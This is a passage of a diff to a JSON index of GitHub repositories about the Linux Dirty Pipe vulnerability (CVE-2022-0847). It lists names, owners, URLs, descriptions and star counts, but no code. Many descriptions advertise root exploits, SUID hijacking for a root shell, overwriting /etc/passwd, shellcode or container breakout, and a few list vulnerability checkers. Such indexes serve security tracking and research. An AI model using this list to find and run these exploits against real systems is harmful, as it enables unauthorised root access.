"https:\/\/avatars.githubusercontent.com\/u\/98105412?v=4", + "html_url": "https:\/\/github.com\/ZZ-SOCMAP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZ-SOCMAP\/CVE-2022-0847", + "description": "Linux Kernel Local Privilege Escalation Vulnerability CVE-2022-0847.", + "fork": false, + "created_at": "2022-03-08T09:10:51Z", + "updated_at": "2024-11-27T21:12:32Z", + "pushed_at": "2022-03-08T09:14:25Z", + "stargazers_count": 58, + "watchers_count": 58, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 58, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 467468720, + "name": "CVE-2022-0847-dirty-pipe-exploit", + "full_name": "cspshivam\/CVE-2022-0847-dirty-pipe-exploit", + "owner": { + "login": "cspshivam", + "id": 59191514, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59191514?v=4", + "html_url": "https:\/\/github.com\/cspshivam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cspshivam\/CVE-2022-0847-dirty-pipe-exploit", + "description": "An exploit for CVE-2022-0847 dirty-pipe vulnerability", + "fork": false, + "created_at": "2022-03-08T10:40:07Z", + "updated_at": "2024-08-12T20:21:22Z", + "pushed_at": "2022-03-08T11:15:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467490371, + "name": "dirtypipez-exploit", + "full_name": "febinrev\/dirtypipez-exploit", + "owner": { + "login": "febinrev", + "id": 52229330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4", + "html_url": "https:\/\/github.com\/febinrev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/febinrev\/dirtypipez-exploit", + "description": "CVE-2022-0847 DirtyPipe Exploit.", + "fork": false, + "created_at": "2022-03-08T11:49:40Z", + "updated_at": "2024-11-16T02:56:29Z", + "pushed_at": "2022-03-08T11:52:22Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 49, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 467507788, + "name": "CVE_2022_0847", + "full_name": "ahrixia\/CVE_2022_0847", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE_2022_0847", + "description": "CVE-2022-0847: Linux Kernel Privilege Escalation Vulnerability", + "fork": false, + "created_at": "2022-03-08T12:43:43Z", + "updated_at": "2024-08-12T20:21:22Z", + "pushed_at": "2022-03-08T13:15:35Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467530713, + "name": "CVE-2022-0847", + "full_name": "knqyf263\/CVE-2022-0847", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/CVE-2022-0847", + "description": "The Dirty Pipe Vulnerability", + "fork": false, + "created_at": "2022-03-08T13:48:55Z", + "updated_at": "2024-11-16T19:50:45Z", + "pushed_at": "2022-03-08T13:54:08Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 47, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 467552702, + "name": "CVE-2022-0847", + "full_name": "puckiestyle\/CVE-2022-0847", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2022-0847", + "description": null, + "fork": false, + "created_at": "2022-03-08T14:46:21Z", + "updated_at": "2024-01-20T21:30:04Z", + "pushed_at": "2022-03-10T08:10:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467569839, + "name": "dirty-pipe", + "full_name": "0xIronGoat\/dirty-pipe", + "owner": { + "login": "0xIronGoat", + "id": 14928858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14928858?v=4", + "html_url": "https:\/\/github.com\/0xIronGoat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xIronGoat\/dirty-pipe", + "description": "Implementation of Max Kellermann's exploit for CVE-2022-0847", + "fork": false, + "created_at": "2022-03-08T15:30:45Z", + "updated_at": "2023-09-10T14:43:20Z", + "pushed_at": "2022-03-08T15:47:53Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467570864, + "name": "CVE-2022-0847-DirtyPipe-Exploit", + "full_name": "ITMarcin2211\/CVE-2022-0847-DirtyPipe-Exploit", + "owner": { + "login": "ITMarcin2211", + "id": 60057530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60057530?v=4", + "html_url": "https:\/\/github.com\/ITMarcin2211", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ITMarcin2211\/CVE-2022-0847-DirtyPipe-Exploit", + "description": null, + "fork": false, + "created_at": "2022-03-08T15:33:39Z", + "updated_at": "2022-03-17T16:07:23Z", + "pushed_at": "2022-03-08T15:36:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467602577, + "name": "CVE-2022-0847-Docker", + "full_name": "mrchucu1\/CVE-2022-0847-Docker", + "owner": { + "login": "mrchucu1", + "id": 12802120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12802120?v=4", + "html_url": "https:\/\/github.com\/mrchucu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrchucu1\/CVE-2022-0847-Docker", + "description": "Docker exploit", + "fork": false, + "created_at": "2022-03-08T17:02:40Z", + "updated_at": "2022-03-08T17:05:05Z", + "pushed_at": "2022-03-08T17:05:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, { "id": 467606236, "name": "CVE-2022-0847-dirty-pipe-checker", @@ -61,6 +557,287 @@ "score": 0, "subscribers_count": 1 }, + { + "id": 467662886, + "name": "CVE-2022-0847", + "full_name": "4luc4rdr5290\/CVE-2022-0847", + "owner": { + "login": "4luc4rdr5290", + "id": 19316088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19316088?v=4", + "html_url": "https:\/\/github.com\/4luc4rdr5290", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4luc4rdr5290\/CVE-2022-0847", + "description": "CVE-2022-0847", + "fork": false, + "created_at": "2022-03-08T20:18:28Z", + "updated_at": "2024-12-16T14:36:05Z", + "pushed_at": "2022-03-08T20:41:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467741460, + "name": "CVE-2022-0847_DirtyPipeExploit", + "full_name": "dadhee\/CVE-2022-0847_DirtyPipeExploit", + "owner": { + "login": "dadhee", + "id": 37909237, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37909237?v=4", + "html_url": "https:\/\/github.com\/dadhee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dadhee\/CVE-2022-0847_DirtyPipeExploit", + "description": "A “Dirty Pipe” vulnerability with CVE-2022-0847 and a CVSS score of 7.8 has been identified, affecting Linux Kernel 5.8 and higher. The vulnerability allows attackers to overwrite data in read-only files. Threat actors can exploit this vulnerability to privilege themselves with code injection.", + "fork": false, + "created_at": "2022-03-09T01:55:04Z", + "updated_at": "2024-08-12T20:21:23Z", + "pushed_at": "2022-03-09T02:01:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467753868, + "name": "CVE-2022-0847-DirtyPipe", + "full_name": "Greetdawn\/CVE-2022-0847-DirtyPipe", + "owner": { + "login": "Greetdawn", + "id": 28551913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28551913?v=4", + "html_url": "https:\/\/github.com\/Greetdawn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Greetdawn\/CVE-2022-0847-DirtyPipe", + "description": null, + "fork": false, + "created_at": "2022-03-09T02:47:06Z", + "updated_at": "2022-03-09T02:52:32Z", + "pushed_at": "2022-03-11T02:55:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467753881, + "name": "CVE-2022-0847", + "full_name": "Al1ex\/CVE-2022-0847", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2022-0847", + "description": "CVE-2022-0847", + "fork": false, + "created_at": "2022-03-09T02:47:08Z", + "updated_at": "2025-01-07T02:46:31Z", + "pushed_at": "2022-03-09T02:47:32Z", + "stargazers_count": 77, + "watchers_count": 77, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-0847" + ], + "visibility": "public", + "forks": 16, + "watchers": 77, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 467788339, + "name": "CVE-2022-0847-DirtyPipe-Exploit", + "full_name": "Mustafa1986\/CVE-2022-0847-DirtyPipe-Exploit", + "owner": { + "login": "Mustafa1986", + "id": 27927358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27927358?v=4", + "html_url": "https:\/\/github.com\/Mustafa1986", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mustafa1986\/CVE-2022-0847-DirtyPipe-Exploit", + "description": null, + "fork": false, + "created_at": "2022-03-09T05:22:20Z", + "updated_at": "2023-04-30T04:51:44Z", + "pushed_at": "2022-03-09T06:16:23Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467818101, + "name": "Dirtypipe-exploit", + "full_name": "nanaao\/Dirtypipe-exploit", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/Dirtypipe-exploit", + "description": "Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn. a root shell. (and attempts to restore the damaged binary as well)", + "fork": false, + "created_at": "2022-03-09T07:16:57Z", + "updated_at": "2024-08-12T20:21:24Z", + "pushed_at": "2022-03-09T04:43:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 467872655, + "name": "cve-2022-0847dirtypipe-exploit", + "full_name": "AyoubNajim\/cve-2022-0847dirtypipe-exploit", + "owner": { + "login": "AyoubNajim", + "id": 68334573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68334573?v=4", + "html_url": "https:\/\/github.com\/AyoubNajim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AyoubNajim\/cve-2022-0847dirtypipe-exploit", + "description": null, + "fork": false, + "created_at": "2022-03-09T10:05:53Z", + "updated_at": "2022-03-10T22:58:10Z", + "pushed_at": "2022-03-09T10:16:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467878952, + "name": "pentestblog-CVE-2022-0847", + "full_name": "pentestblogin\/pentestblog-CVE-2022-0847", + "owner": { + "login": "pentestblogin", + "id": 70894330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70894330?v=4", + "html_url": "https:\/\/github.com\/pentestblogin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pentestblogin\/pentestblog-CVE-2022-0847", + "description": null, + "fork": false, + "created_at": "2022-03-09T10:24:42Z", + "updated_at": "2022-03-09T10:26:10Z", + "pushed_at": "2022-03-09T10:26:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467990193, + "name": "CVE-2022-0847", + "full_name": "gyaansastra\/CVE-2022-0847", + "owner": { + "login": "gyaansastra", + "id": 35690123, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35690123?v=4", + "html_url": "https:\/\/github.com\/gyaansastra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gyaansastra\/CVE-2022-0847", + "description": "Dirty Pipe POC", + "fork": false, + "created_at": "2022-03-09T15:44:58Z", + "updated_at": "2024-05-09T02:22:17Z", + "pushed_at": "2022-03-20T15:46:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, { "id": 468068745, "name": "dirtypipe-container-breakout-poc", @@ -92,6 +869,254 @@ "score": 0, "subscribers_count": 8 }, + { + "id": 468143759, + "name": "CVE-2022-0847", + "full_name": "babyshen\/CVE-2022-0847", + "owner": { + "login": "babyshen", + "id": 11402197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11402197?v=4", + "html_url": "https:\/\/github.com\/babyshen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/babyshen\/CVE-2022-0847", + "description": "A root exploit for CVE-2022-0847 (Dirty Pipe)", + "fork": false, + "created_at": "2022-03-10T00:54:11Z", + "updated_at": "2022-03-10T01:00:55Z", + "pushed_at": "2022-03-10T01:02:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468148868, + "name": "CVE-2022-0847-Linux", + "full_name": "edsonjt81\/CVE-2022-0847-Linux", + "owner": { + "login": "edsonjt81", + "id": 27496739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27496739?v=4", + "html_url": "https:\/\/github.com\/edsonjt81", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edsonjt81\/CVE-2022-0847-Linux", + "description": null, + "fork": false, + "created_at": "2022-03-10T01:18:26Z", + "updated_at": "2022-03-10T01:18:36Z", + "pushed_at": "2022-03-10T01:18:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468151065, + "name": "CVE-2022-0847", + "full_name": "chenaotian\/CVE-2022-0847", + "owner": { + "login": "chenaotian", + "id": 86546351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86546351?v=4", + "html_url": "https:\/\/github.com\/chenaotian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chenaotian\/CVE-2022-0847", + "description": "CVE-2022-0847 POC and Docker and Analysis write up", + "fork": false, + "created_at": "2022-03-10T01:27:29Z", + "updated_at": "2024-08-12T20:21:25Z", + "pushed_at": "2022-03-10T01:31:57Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 25, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 468352446, + "name": "CVE-2022-0847-DirtyPipe-Exploit", + "full_name": "V0WKeep3r\/CVE-2022-0847-DirtyPipe-Exploit", + "owner": { + "login": "V0WKeep3r", + "id": 78677532, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78677532?v=4", + "html_url": "https:\/\/github.com\/V0WKeep3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/V0WKeep3r\/CVE-2022-0847-DirtyPipe-Exploit", + "description": "CVE-2022-0847-DirtyPipe-Exploit", + "fork": false, + "created_at": "2022-03-10T13:23:52Z", + "updated_at": "2022-03-10T13:40:33Z", + "pushed_at": "2022-03-10T13:41:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468416712, + "name": "CVE-2022-0847-Dirty-Pipe", + "full_name": "al4xs\/CVE-2022-0847-Dirty-Pipe", + "owner": { + "login": "al4xs", + "id": 40411471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40411471?v=4", + "html_url": "https:\/\/github.com\/al4xs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/al4xs\/CVE-2022-0847-Dirty-Pipe", + "description": null, + "fork": false, + "created_at": "2022-03-10T16:09:16Z", + "updated_at": "2022-03-10T16:10:15Z", + "pushed_at": "2022-03-10T16:09:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468586082, + "name": "CVE-2022-0847-DirtyPipe-", + "full_name": "Greetdawn\/CVE-2022-0847-DirtyPipe-", + "owner": { + "login": "Greetdawn", + "id": 28551913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28551913?v=4", + "html_url": "https:\/\/github.com\/Greetdawn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Greetdawn\/CVE-2022-0847-DirtyPipe-", + "description": null, + "fork": false, + "created_at": "2022-03-11T02:51:54Z", + "updated_at": "2022-03-11T02:51:54Z", + "pushed_at": "2022-03-11T02:51:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468666839, + "name": "DirtyPipePython", + "full_name": "crusoe112\/DirtyPipePython", + "owner": { + "login": "crusoe112", + "id": 6531586, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6531586?v=4", + "html_url": "https:\/\/github.com\/crusoe112", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crusoe112\/DirtyPipePython", + "description": "A Python-based DirtyPipe (CVE-2022-0847) POC to pop a root shell", + "fork": false, + "created_at": "2022-03-11T08:22:56Z", + "updated_at": "2023-11-07T15:27:32Z", + "pushed_at": "2022-03-23T22:46:58Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468964454, + "name": "dirtyPipe-automaticRoot", + "full_name": "nanaao\/dirtyPipe-automaticRoot", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/dirtyPipe-automaticRoot", + "description": "CVE-2022-0847 Python exploit to get root or write a no write permission, immutable or read-only mounted file.", + "fork": false, + "created_at": "2022-03-12T03:05:40Z", + "updated_at": "2024-08-12T20:21:28Z", + "pushed_at": "2022-03-11T22:27:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, { "id": 469063637, "name": "CVE-2022-0847", @@ -154,6 +1179,232 @@ "score": 0, "subscribers_count": 15 }, + { + "id": 469282891, + "name": "Dirty-Pipe-CVE-2022-0847", + "full_name": "sa-infinity8888\/Dirty-Pipe-CVE-2022-0847", + "owner": { + "login": "sa-infinity8888", + "id": 95272899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95272899?v=4", + "html_url": "https:\/\/github.com\/sa-infinity8888", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sa-infinity8888\/Dirty-Pipe-CVE-2022-0847", + "description": "CVE-2022-0847 (Dirty Pipe) is an arbitrary file overwrite vulnerability that allows escalation of privileges by modifying or overwriting arbitrary read-only files e.g. \/etc\/passwd, \/etc\/shadow.", + "fork": false, + "created_at": "2022-03-13T05:51:06Z", + "updated_at": "2024-08-12T20:21:30Z", + "pushed_at": "2022-03-13T06:02:30Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-0847", + "cybersecurity", + "dirtypipe" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469473653, + "name": "dirtypipetester", + "full_name": "realbatuhan\/dirtypipetester", + "owner": { + "login": "realbatuhan", + "id": 68564239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68564239?v=4", + "html_url": "https:\/\/github.com\/realbatuhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/realbatuhan\/dirtypipetester", + "description": "Dirty Pipe (CVE-2022-0847) zafiyeti kontrolü ", + "fork": false, + "created_at": "2022-03-13T19:30:14Z", + "updated_at": "2022-03-14T05:00:16Z", + "pushed_at": "2022-03-13T19:49:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469743112, + "name": "CVE-2022-0847-POC", + "full_name": "CYB3RK1D\/CVE-2022-0847-POC", + "owner": { + "login": "CYB3RK1D", + "id": 37270599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37270599?v=4", + "html_url": "https:\/\/github.com\/CYB3RK1D", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CYB3RK1D\/CVE-2022-0847-POC", + "description": "dirtypipe", + "fork": false, + "created_at": "2022-03-14T13:21:25Z", + "updated_at": "2022-03-17T15:54:57Z", + "pushed_at": "2022-03-15T17:41:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469794565, + "name": "dirty-pipe-poc", + "full_name": "breachnix\/dirty-pipe-poc", + "owner": { + "login": "breachnix", + "id": 84611050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84611050?v=4", + "html_url": "https:\/\/github.com\/breachnix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/breachnix\/dirty-pipe-poc", + "description": "CVE-2022-0847 POC", + "fork": false, + "created_at": "2022-03-14T15:32:25Z", + "updated_at": "2024-08-12T20:21:33Z", + "pushed_at": "2022-03-14T20:34:57Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 469930369, + "name": "cve_2022_0847_shellcode", + "full_name": "Shotokhan\/cve_2022_0847_shellcode", + "owner": { + "login": "Shotokhan", + "id": 52707252, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52707252?v=4", + "html_url": "https:\/\/github.com\/Shotokhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shotokhan\/cve_2022_0847_shellcode", + "description": "Implementation of CVE-2022-0847 as a shellcode", + "fork": false, + "created_at": "2022-03-14T22:54:15Z", + "updated_at": "2024-08-12T20:21:33Z", + "pushed_at": "2022-03-14T23:05:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-0847", + "dirty-pipe", + "kernel", + "shellcode" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 470069674, + "name": "DirtyPIPE-CVE-2022-0847", + "full_name": "githublihaha\/DirtyPIPE-CVE-2022-0847", + "owner": { + "login": "githublihaha", + "id": 43808858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43808858?v=4", + "html_url": "https:\/\/github.com\/githublihaha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/githublihaha\/DirtyPIPE-CVE-2022-0847", + "description": null, + "fork": false, + "created_at": "2022-03-15T08:33:19Z", + "updated_at": "2022-03-15T08:34:07Z", + "pushed_at": "2022-03-15T08:55:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 470128338, + "name": "CVE-2022-0847-dirty-pipe-kernel-checker", + "full_name": "MrP1xel\/CVE-2022-0847-dirty-pipe-kernel-checker", + "owner": { + "login": "MrP1xel", + "id": 16755572, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16755572?v=4", + "html_url": "https:\/\/github.com\/MrP1xel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrP1xel\/CVE-2022-0847-dirty-pipe-kernel-checker", + "description": "Python script to check if your kernel is vulnerable to Dirty pipe CVE-2022-0847", + "fork": false, + "created_at": "2022-03-15T11:25:19Z", + "updated_at": "2023-07-19T19:19:14Z", + "pushed_at": "2022-03-15T11:30:58Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, { "id": 470139953, "name": "CVE-2022-0847-DirtyPipe-Container-Breakout", @@ -222,6 +1473,37 @@ "score": 0, "subscribers_count": 2 }, + { + "id": 472123951, + "name": "pwncat_dirtypipe", + "full_name": "DanaEpp\/pwncat_dirtypipe", + "owner": { + "login": "DanaEpp", + "id": 11337016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11337016?v=4", + "html_url": "https:\/\/github.com\/DanaEpp", + "user_view_type": "public" + }, + "html_url": 